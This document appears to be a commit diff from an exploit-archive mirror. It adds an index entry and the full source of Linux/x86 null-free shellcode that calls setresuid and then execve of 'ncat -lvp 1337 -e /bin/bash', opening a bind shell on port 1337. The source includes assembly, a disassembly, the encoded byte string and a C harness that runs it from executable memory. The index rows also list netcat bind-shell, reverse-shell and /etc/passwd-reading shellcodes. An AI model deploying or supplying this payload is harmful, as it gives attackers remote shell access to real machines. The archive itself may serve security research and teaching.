45980,shellcodes/linux_x86/45980.c,"Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86

1 id file description date author type platform
925 45821 shellcodes/linux_x86/45821.c Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes) 2018-11-13 Javier Tello shellcode linux_x86
926 45940 shellcodes/linux/45940.nasm Linux/x86 - /usr/bin/head -n99 cat etc/passwd Shellcode (61 Bytes) 2018-12-04 Nelis shellcode linux
927 45943 shellcodes/linux_x86-64/45943.c Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes) 2018-12-04 Kağan Çapar shellcode linux_x86-64
928 45980 shellcodes/linux_x86/45980.c Linux/x86 - execve(/usr/bin/ncat -lvp 1337 -e /bin/bash)+Null-Free Shellcode (95 bytes) 2018-12-11 T3jv1l shellcode linux_x86

145
shellcodes/linux_x86/45980.c Normal file
View file

@ -0,0 +1,145 @@
/*
Linux/x86-execve(/usr/bin/ncat -lvp 1337 -e/bin/bash)+NULL-FREE Shellcode(95 bytes)
Author : T3jv1l
Contact: t3jv1l@gmail.com
Twitter:https://twitter.com/T3jv1l
Shellcode len : 119 bytes
Compilation: gcc shellcode.c -o shellcode
Compilation for x64 : gcc -m32 shellcode.c -o shellcode
Tested On: Ubuntu 16.04.5 LTS
Arch: x86
Size: 95 bytes
Thanks for helping NytroRST
############################################################################
global _start:
_start:
jmp short todo
shellcode:
xor eax, eax ;Zero out eax
xor ebx, ebx ;Zero out ebx
xor ecx, ecx ;Zero out ecx
cdq ;Zero out edx using the sign bit from eax
mov BYTE al, 0xa4 ;Setresuid syscall 164 (0xa4)
int 0x80 ;Syscall execute
pop esi ;Esi contain the string in db
xor eax, eax ;Zero out eax
mov[esi+13], al ;Null terminate /usr/bin/ncat
mov[esi+22], al ;Null terminate -lvp1337
mov[esi+34], al ;Null terminate -e/bin/bash
mov[esi+35], esi ;Store address of /usr/bin/ncat in AAAA
lea ebx, [esi+14] ;Load address of -lvp1337
mov[esi+39], ebx ;Store address of -lvp1337 in BBBB taken from ebx
lea ebx, [esi+23] ;Load address of -e/bin/bash into ebx
mov[esi+43], ebx ;Store address of -e/bin/bash in CCCC taken from ebx
mov[esi+47], eax ;Zero out DDDD
mov al, 11 ;11 is execve syscall number
mov ebx, esi ;Store address of /usr/bin/ncat
lea ecx, [esi+35] ;Load address of ptr to argv[] array
lea edx, [esi+47] ;envp[] NULL
int 0x80 ;Syscall execute
todo:
call shellcode
db '/usr/bin/ncat#-lvp1337#-e/bin/bash#AAAABBBBCCCCDDDD'
; 012345678901234567890123456789012345678901234567890
######################################################################################
ncat.o: file format elf32-i386
Disassembly of section .text:
00000000 <_start>:
0: eb 35 jmp 37 <todo>
00000002 <shellcode>:
2: 31 c0 xor %eax,%eax
4: 31 db xor %ebx,%ebx
6: 31 c9 xor %ecx,%ecx
8: 99 cltd
9: b0 a4 mov $0xa4,%al
b: cd 80 int $0x80
d: 5e pop %esi
e: 31 c0 xor %eax,%eax
10: 88 46 0d mov %al,0xd(%esi)
13: 88 46 16 mov %al,0x16(%esi)
16: 88 46 22 mov %al,0x22(%esi)
19: 89 76 23 mov %esi,0x23(%esi)
1c: 8d 5e 0e lea 0xe(%esi),%ebx
1f: 89 5e 27 mov %ebx,0x27(%esi)
22: 8d 5e 17 lea 0x17(%esi),%ebx
25: 89 5e 2b mov %ebx,0x2b(%esi)
28: 89 46 2f mov %eax,0x2f(%esi)
2b: b0 0b mov $0xb,%al
2d: 89 f3 mov %esi,%ebx
2f: 8d 4e 23 lea 0x23(%esi),%ecx
32: 8d 56 2f lea 0x2f(%esi),%edx
35: cd 80 int $0x80
00000037 <todo>:
37: e8 c6 ff ff ff call 2 <shellcode>
3c: 2f das
3d: 75 73 jne b2 <todo+0x7b>
3f: 72 2f jb 70 <todo+0x39>
41: 62 69 6e bound %ebp,0x6e(%ecx)
44: 2f das
45: 6e outsb %ds:(%esi),(%dx)
46: 63 61 74 arpl %sp,0x74(%ecx)
49: 23 2d 6c 76 70 31 and 0x3170766c,%ebp
4f: 33 33 xor (%ebx),%esi
51: 37 aaa
52: 23 2d 65 2f 62 69 and 0x69622f65,%ebp
58: 6e outsb %ds:(%esi),(%dx)
59: 2f das
5a: 62 61 73 bound %esp,0x73(%ecx)
5d: 68 23 41 41 41 push $0x41414123
62: 41 inc %ecx
63: 42 inc %edx
64: 42 inc %edx
65: 42 inc %edx
66: 42 inc %edx
67: 43 inc %ebx
68: 43 inc %ebx
69: 43 inc %ebx
6a: 43 inc %ebx
6b: 44 inc %esp
6c: 44 inc %esp
6d: 44 inc %esp
6e: 44 inc %esp
###################################################################################
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
int (*shellcodetotest)();
char shellcode[] = "\xeb\x35\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x5e\x31\xc0\x88\x46\x0d\x88\x46\x16\x88\x46\x22\x89\x76\x23\x8d\x5e\x0e\x89\x5e\x27\x8d\x5e\x17\x89\x5e\x2b\x89\x46\x2f\xb0\x0b\x89\xf3\x8d\x4e\x23\x8d\x56\x2f\xcd\x80\xe8\xc6\xff\xff\xff\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x6e\x63\x61\x74\x23\x2d\x6c\x76\x70\x31\x33\x33\x37\x23\x2d\x65\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x23";
int main(int argc, char **argv) {
void *ptr = mmap(0, 150, PROT_EXEC | PROT_WRITE| PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if(ptr == MAP_FAILED){
perror("mmap");
exit(-1);
printf("Shellcode Length: %d\n", strlen(shellcode));
}
memcpy(ptr, shellcode, sizeof(shellcode));
shellcodetotest = ptr;
shellcodetotest();
return 0;
}